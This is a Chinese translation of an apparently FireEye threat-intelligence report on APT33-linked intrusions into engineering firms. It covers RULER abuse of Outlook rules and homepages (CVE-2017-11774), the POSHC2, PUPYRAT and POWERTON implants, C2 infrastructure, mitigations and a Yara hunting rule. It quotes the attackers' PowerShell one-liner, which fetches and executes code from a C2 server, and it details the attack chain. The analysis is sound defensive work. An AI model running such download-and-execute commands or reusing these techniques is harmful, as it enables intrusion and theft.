一、简介

FireEye评估APT33可能是工程行业内一系列入侵和企图入侵的幕后推手。公开报告表明此活动可能与最近的破坏性攻击SHAMOON有关。FireEye的Managed Defense已经响应并包括了我们评估的许多相关入侵。该攻击者在入侵的早期阶段利用公开可用的工具。然而，我们观察到它们在后期活动中转换为定制植入程序试图绕过检测。

2017年9月20日，FireEye Intelligence发布了一篇文章，详细介绍了针对能源和航空航天业的鱼叉式网络钓鱼活动。最近的公开报告表明，APT33鱼叉式网络钓鱼与SHAMOON攻击之间可能存在联系;但是，我们无法独立核实。FireEye的高级实践团队利用遥测和积极的主动操作来保持APT33的可见性。这些努力使我们能够建立一个操作时间表，该操作时间表与在攻击者完成任务之前确定并包含的多个入侵管理防御一致。我们使用下面描述的内部开发的相似性引擎来关联入侵。此外，公开讨论还表明，我们观察到的特定攻击者基础设施可能与最近的SHAMOON攻击有关。

45 days ago, during 24x7 monitoring, #ManagedDefense detected & contained an attempted intrusion from newly-identified adversary infrastructure*.It is C2 for a code family we track as POWERTON.*hxxps://103.236.149[.]100/api/info

— FireEye (@FireEye) December 15, 2018

二、识别威胁行为中的重叠

FireEye应用自身的专业知识和内部开发的相似性引擎，来评估组织和行动之间的潜在关联和关系。使用文档聚类和主题建模的概念，该引擎提供了一个框架，用于计算和发现活动组织之间的相似性，为后续分析提供调查线索。我们的引擎确定了工程行业内一系列入侵之间的相似之处。近乎实时的结果有助于深入的比较分析。FireEye分析了来自众多入侵和已知APT33活动的所有可用有机信息。随后我们以中等信心得出结论，两个特定的早期阶段入侵系同一组织行为。之后，高级实践团队基于去年观察到的确认的APT33活动重建了操作时间表。我们将其与所包含的入侵的时间线进行了比较，并确定在规定的时间范围内，在工具选择中包含很明显的相似性。我们低等信心地评估入侵是由APT33进行的。此博客仅包含原始源材料，而包含全源分析的Finished Intelligence可在我们的门户网站中找到。为了更好的理解对手使用的技术，有必要在24x7全天候监控期间提供有关此活动的Managed Defense响应的背景信息。

三、Managed Defense快速反应：调查攻击者

2017年11月中旬，Managed Defense确定并响应了针对工程行业客户的威胁活动。攻击者利用窃取的凭据和公开可用的工具——SensePost的RULER来配置客户端邮件规则，旨在从自己控制的WebDAV服务器85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f)下载并执行恶意载荷。

有效载荷是一个AutoIT下载程序，它从hxxps://85.206.161[.]216:8080/HomePage.htm获取并执行其他PowerShell。后续的PowerShell依据目标系统的架构，下载合适的PowerSploit变种（MD5：c326f156657d1c41a9c387415bf779d4或0564706ec38d15e981f71eaf474d0ab8），并反射加载PUPYRAT（MD5：94cd86a0a4d747472c2b3f1bc3279d77或17587668AC577FCE0B278420B8EB72AC）。该攻击者利用公开可用的CVE-2017-0213漏洞提升权限，公开可用的Windows SysInternals PROCDUMP转储LSASS进程，以及公开提供的MIMIKATZ窃取其他凭据。Managed Defense有助于受害者控制入侵。

FireEye收集了168个PUPYRAT样本进行比较。虽然导入哈希值（IMPHASH）不足以归因溯源，但我们发现，在指定的抽样中，攻击者的IMPHASH仅在六个样本中被发现，其中两个被确认属于在Managed Defense中观察到的威胁行为者，并且一个归于APT33。我们还确定APT33可能在此期限内从PowerShell EMPIRE过渡到PUPYRAT。

在2018年7月中旬，Managed Defense确定了针对同一行业的类似针对性威胁活动。该攻击者利用窃取的凭据和利用CVE-2017-11774（RULER.HOMEPAGE）漏洞的RULER模块，修改了众多用户的Outlook客户端主页，以实现代码执行和持久性。这些方法在本文“RULER In-The-Wild”章节中进一步探讨。

攻击者利用这种持久性机制来下载和执行公开可用的.NET POSHC2后门的OS依赖变体，以及一个新发现的基于PowerShell的植入程序POWERTON。Managed Defens迅速参与并成功控制了入侵。值得注意的是，Advanced Practices分别确定APT33至少从2018年7月2日开始使用POSHC2，并在2018年期间继续使用。

在7月的活动期间，Managed Defense观察了hxxp://91.235.116[.]212/index.html上托管的主页漏洞利用的三个变体。一个例子如图1所示。

图1：攻击者的主页利用（CVE-2017-11774）

每个漏洞利用程序中的主编码有效载荷使用WMIC进行系统分析，以确定适当的依赖于操作系统的POSHC2植入程序，并将名为“Media.ps1”的PowerShell脚本保存在用户的％LOCALAPPDATA％目录中（％LOCALAPPDATA％\MediaWs\Media.ps1），如图2所示。

图2：攻击者的“Media.ps1”脚本

“Media.ps1”的目的是解码并执行下载的二进制有效载荷，该有效载荷写入磁盘文件“C:\Users\Public\Downloads\log.dat”。在后续阶段，此PowerShell脚本将通过配置注册表Run键，在主机上维持持久性。

对“log.dat”有效载荷的分析确定它们是公开可用的POSHC2的变体，用于从硬编码的命令和控制（C2）地址下载和执行PowerShell有效载菏。这些特定的POSHC2样本在.NET框架上运行，并从Base64编码的字符串动态加载有效载荷。植入程序通过HTTP向C2服务器（hxxps://51.254.71[.]223/images/static/content/）发送侦察报告，之后的响应为PowerShell源代码。侦察报告包含以下信息：

· 用户名和域名

· 计算机名

· CPU详细信息

· 当前exe的PID

· 配置C2服务器

C2消息使用硬编码密钥的AES加密，并使用Base64编码。正是这个POSHC2二进制文件为前面提到的“Media.ps1”PowerShell脚本建立了持久性，然后在系统启动时解码并执行POSHC2二进制文件。在2018年7月确定的活动期间，POSHC2变体的配置终止日期为2018年7月29日。

利用POSHC2下载并执行一个新的基于PowerShell的植入程序，命名为POWERTON（hxxps://185.161.209[.]172/api/info）。在此期间，攻击者在与POWERTON的互动方面取得了部分进展该攻击者能够下载名为“ClouldPackage.exe”的AutoIt二进制文件（MD5：46038aa5b21b940099b0db413fa62687）并建立持久性，这是通过POWERTON “persist”命令实现的。“ClouldPackage.exe”的唯一功能是执行以下PowerShell代码：

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

此代码的目的是从C2服务器获取“静默模式”POWERTON。请注意，攻击者使用强大的凭据保护其后续有效载荷。在此之后不久，Managed Defense遏制了入侵。

大约三周后，攻击者通过密码枚举成功的重建访问权限。Managed Defense立即确定了使用RULER部署恶意主页的攻击者在工作站上持续存在。他们对一些基础设施和工具进行了更改，包含额外的混淆层以规避检测。攻击者在新的C2服务器（hxxp://5.79.66[.]241/index.html）上托管他们的主页漏洞利用。在此期间，至少发现了三个“index.html”的新变种。其中两个变体包含编写的PowerShell代码，用于下载新的依赖于OS的.NET POSHC2的变体，如图3所示。

图3：特定操作系统的POSHC2下载器

图3显示攻击者进行了一些小的更改，例如编码PowerShell “DownloadString”命令并将生成的POSHC2和.ps1文件重命名保存在磁盘上。解码后，命令将尝试从另一个新的C2服务器（hxxp://103.236.149[.]124/delivered.dat）下载POSHC2二进制文件。为解码并执行POSHC2变体而释放的.ps1的文件名也更改为“Vision.ps1”。在2018年8月的活动期间，POSHC2变体配置的“终止日期”为2018年8月13日。请注意，POSHC2支持终止日期，以便随时间保护入侵，并且此功能内置于框架中。

再次，POSHC2用于下载POWERTON的新变种（MD5：c38069d0bc79acdc28af3820c1123e53），配置为与C2域名hxxps://basepack[.]org通信。在8月下旬的某个时刻，在POSHC2终止日期之后，攻击使用RULER.HOMEPAGE直接下载POWERTON，绕过先前观察到的中间阶段。

由于Managed Defense对这些入侵的早期遏制，我们无法确定攻击者的动机;但很明显，他们强烈要求获得并维持对受害者网络的访问。

四、基础设施监控

高级实践团队进行积极主动的操作，以便大规模地识别和监控攻击者基础设施。2018年7月16日至10月11日期间，攻击者在hxxp://91.235.116[.]212/index.html维持RULER.HOMEPAGE有效载荷。至少在2018年10月11日，攻击者改变了有效载荷（MD5） ：8be06571e915ae3f76901d52068e3498），该有效载荷从hxxps://103.236.149[.]100/api/info（MD5：4047e238bbcec147f8b97d849ef40ce5）下载并执行POWERTON样本。此特定的URL在公开讨论中被识别为可能与最近的破坏性攻击有关。我们无法用拥有的任何有机信息独立验证此相关性。

在2018年12月13日，Advanced Practices主动识别并归因hxxp://89.45.35[.]235/index.html（MD5：f0fe6e9dde998907af76d91ba8f68a05）上托管的恶意RULER.HOMEPAGE有效载荷。此有效载荷用于下载和执行托管在hxxps://staffmusic[.]org/transfer/view（MD5：53ae59ed03fa5df3bf738bc0775a91d9）的POWERTON。

表1包含我们所分析活动的操作时间表。

表1: 操作时间线

五、展望和启示

如果在这些入侵期间观察到的活动与APT33相关联，则表明APT33可能保留了我们之前未曾观察到的专有能力，直到来自Managed Defense的持续压力迫使其使用。FireEye Intelligence此前曾报道，APT33与破坏性恶意软件有关，它们对关键基础设施构成了更大的风险。这种风险在能源部门是显而易见的，我们一直监测它们的目标。该目标与伊朗国家经济增长优势和竞争优势相一致，特别是与石化生产有关。

我们将继续独立跟踪这些组织，直到我们确信它们是相同的。除了根据需要的专有植入程序之外，所描述的每个入侵背后的操作者都使用了公众可获得但未广泛理解的工具和技术。Managed Defense有权每天在各种行业和对手中接触入侵活动。这一日常的前线体验得到了高级实践团队，FireEye实验室高级逆向工程（FLARE）和FireEye Intelligence的支持，为我们的客户提供了他们可以对付复杂对手的所有方法。我们欢迎其他原始来源信息，以确认或驳斥我们的分析判断。

六、定制化后门: POWERTON

POWERTON是一个用PowerShell编写的后门程序; FireEye尚未发现任何具有类似代码库的公开工具集，表明它可能是定制的。POWERTON旨在支持多种持久性机制，包括WMI和自动运行注册表项。与C2的通信是通过TCP / HTTP（S）进行的，并利用AES加密与C2之间的通信流量。POWERTON通常作为后期后门进行部署，并使用多层混淆处理。

FireEye观测到了至少两个独立版本的POWERTON，分别为POWERTON.v1和POWERTON.v2，并进行了跟踪，其中后者改进了其命令和控制功能，并集成了转储密码哈希的功能。

表2包含POWERTON的样本。

表2: POWERTON 恶意软件样本

七、攻击方法：崛起的电子邮件利用

Outlook和Exchange无处不在。用户便利性是技术进步背后的主要驱动力，但用户的便捷访问通常会为攻击者提供额外的攻击面。随着机构在公共互联网向其用户开放电子邮件服务器的访问，使其成为入侵媒介。FireEye观察到攻击的增加对Exchange和Office365的安全控制提出了挑战和颠覆。在2018年FireEye网络防御峰会，我们的Mandiant顾问还提供了几种攻击者使用的新方法，用于破坏多因素身份验证。

在FireEye，我们的决策是数据驱动的，但提供给我们的数据通常是不完整的，必须根据我们的专业知识推断缺失的部分，以便我们有效地应对入侵。利用的合理方案如下。

攻击者通过任何方式收集机构为用户提供的一对有效凭据，以下并非所有详尽示例：

· 第三方泄露中的用户重复使用凭据;企业是否使用电子邮件地址的命名标准，例如[email protected]？企业内的用户可能拥有个人电子邮件地址，其姓名和附属密码在某个地方的第三方泄露中受到了侵害。他们重新使用了那个密码吗？

· 在之前的入侵中，凭据已被泄露但未被识别或重置。

· 弱口令或密码安全策略导致暴力破解凭据。

· 从各种其他来源收集可破解的密码哈希值，例如通过用于进行网络钓鱼的文档收集的用户NTLM哈希值。

· 凭据收集网络钓鱼诈骗，其中收集的凭据可以在互联网上的其他地方永久销售，重复使用或记录。

攻击者拥有合法凭据后，即可识别未受多因素身份验证保护的可公开访问的Outlook Web Access（OWA）或Office 365。攻击者利用窃取的凭据和RULER等工具通过Exchange的合法功能开展漏洞利用。

八、无所不在的RULER

SensePost的RULER是一种工具，旨在通过基于HTTP协议的消息传递应用程序编程接口（MAPI）或远程过程调用（RPC）与Exchange服务器进行交互。正如2017年11月中旬的“Managed Defense快速响应”部分所述，FireEye监测到了单个主机上现有Outlook电子邮件客户端进程生成的网络活动，通过Web分布式创作和版本控制（WebDAV）与攻击者控制的IP地址85.206.161 [.] 214进行连接。此通信获取使用Aut2Exe（MD5：95f3bea43338addc1ad951cd2d42eb6f）创建的可执行文件，并执行PowerShell代码以获取更多恶意内容。

尽管没有受影响邮箱的日志记录，我们仍然可以评估此活动是使用上述工具创建的恶意邮件规则的结果，原因如下：

· Outlook.exe通过WebDAV直接请求在攻击者IP地址上托管的恶意可执行文件。除非直接利用Outlook的某些功能，否则这是意料之外的;像网络钓鱼这样的传统媒介会显示一个父进程，其中Outlook产生了Office、Acrobat或类似的子进程。进程注入意味着先前在主机上执行恶意代码，这些证据不支持。

· 95f3bea43338addc1ad951cd2d42eb6f的转输是通过WebDAV进行的。RULER通过公开一个简单的WebDAV服务器和一个命令行模块来实现这一点，该命令行模块用于创建指向该WebDAV托管的有效载荷的客户端邮件规则。

· 在初始传输阶段选择WebDAV是邮件规则创建限制的结果;在保存规则之前，有效载荷必须是“本地”可访问的，这意味着不允许使用HTTP或FTP之类的协议。这一点在之前Silent Break Security有关RULER创建的初步报告中进行了详细介绍。这使通过UNC文件路径的SMB和WebDAV成为Outlook规则传输恶意载荷的可用选项。从网络角度来看，WebDAV可能不会引起重视，因为与发现通过端口80和443连接到互联网的WebDAV事务相比，发现域内主机通过SMB与任意IP地址的非域内主机进行通信更引人关注。

· 通过Outlook客户端邮件规则执行的有效载荷不能包含任何参数，这可能是选择已编译的Aut2exe可执行文件的原因。 95f3bea43338addc1ad951cd2d42eb6f除了执行PowerShell单行程序以获取其他恶意内容外，什么都不做。但是，由于此限制，无法使用Outlook规则在本机执行此命令。

考虑到这一点，初始感染如图4所示。

图4：初始感染载体

随着攻击者和防御者继续探索电子邮件安全，很快就会采用公开发布的技术和漏洞。 SensePost对CVE-2017-11774的识别和负责任的披露并没有什么不同。有关从攻击者的角度滥用Outlook主页的shell和持久性的绝佳描述，请参阅SensePost的博客（SensePost's blog）。

FireEye观察到测并记载了几个恶意攻击者使用这种特定主页开发技术的情况。根据我们的经验，由于防御者曲解并专注于不正确的缓解方法，这种特殊方法可能会更成功。这是可以理解的，因为一些维护者在观察导致恶意代码执行的Outlook产生过程时可能首先了解了CVE-2017-11774的成功利用。当此观察结果与可能类似于恶意HTML应用程序（.hta）附件的独立取证工具相结合时，证据可能会被误解为通过网络钓鱼电子邮件的初始感染。这个错误的假设忽略了攻击者需要有效凭据来部署CVE-2017-11774的事实，因此感染的范围可能大于已发现主页持久性的个人用户Outlook客户端。为帮助防御者，我们在文末包含了一个Yara规则来区分这些Outlook主页有效载荷。

了解这种细微差别进一步突出了此攻击者结合密码枚举使用此技术的风险，并强调了分层电子邮件安全防御的重要性，包括多因素身份验证和补丁管理。我们建议组织尽可能减少其电子邮件攻击面。值得注意的是，选择通过云服务提供商托管其电子邮件的组织仍必须确保用于访问该服务器的软件客户端已修补。除了为Outlook 365 / Exchange访问实施多因素身份验证之外，表3中的Microsoft安全更新还将有助于减轻已知和记载的攻击媒介，这些攻击媒介会被工具包（如SensePost的RULER）利用。

表3: Outlook 攻击面缓解

九、检测技术

FireEye在我们的平台上检测到此活动，包括POSHC2，PUPYRAT和POWERTON的命名检测。表4包含几个适用于电子邮件利用和初始感染活动的特定检测名称。

表4：FireEye产品检测

对于有兴趣寻找Outlook主页shell和持久性的机构，我们已经包含了一个Yara规则，该规则也可以用于区分这些有效载荷与其他脚本：

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}